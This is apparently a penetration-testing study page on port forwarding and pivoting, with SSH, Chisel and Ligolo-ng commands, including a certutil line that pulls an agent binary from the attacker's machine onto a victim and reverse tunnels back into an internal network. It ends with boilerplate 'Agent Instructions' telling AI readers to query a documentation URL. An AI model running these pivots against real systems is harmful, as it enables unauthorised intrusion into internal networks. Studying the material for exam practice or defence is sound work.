# Port Forwarding

## SSH

* Method 1:

{% code overflow="wrap" fullWidth="true" %}

```
On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append socks5 127.0.0.1 <port>
  # Append proxychains infront of any command targeted at the internal network moving forward

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x
```

{% endcode %}

* Method 2:

{% code overflow="wrap" fullWidth="true" %}

```
ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port
```

{% endcode %}

## Chisel

{% embed url="<https://github.com/jpillora/chisel>" %}

{% code overflow="wrap" fullWidth="true" %}

```
On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks
```

{% endcode %}

## Ligolo-ng

1. Set up ligolo

{% embed url="<https://github.com/Nicocha30/ligolo-ng>" %}

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkidr ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

```

{% endcode %}

2. Initiate tunnel

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine (~\ligolo\proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once Agent joins the Server, Return to Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners based on what you want the internal network to reach you for, then they will connect to the pivot machine via specified port
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added
```

{% endcode %}

* Now you can reach the internal network directly like is just part of your network
* Just that the internal machines are talking to your proxy (pivot point) instead of directly to you

<figure><img src="/files/cTH61I5CzIoTQsXVfcal" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://personal-archive.gitbook.io/oscp-exam-prep/commons/port-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.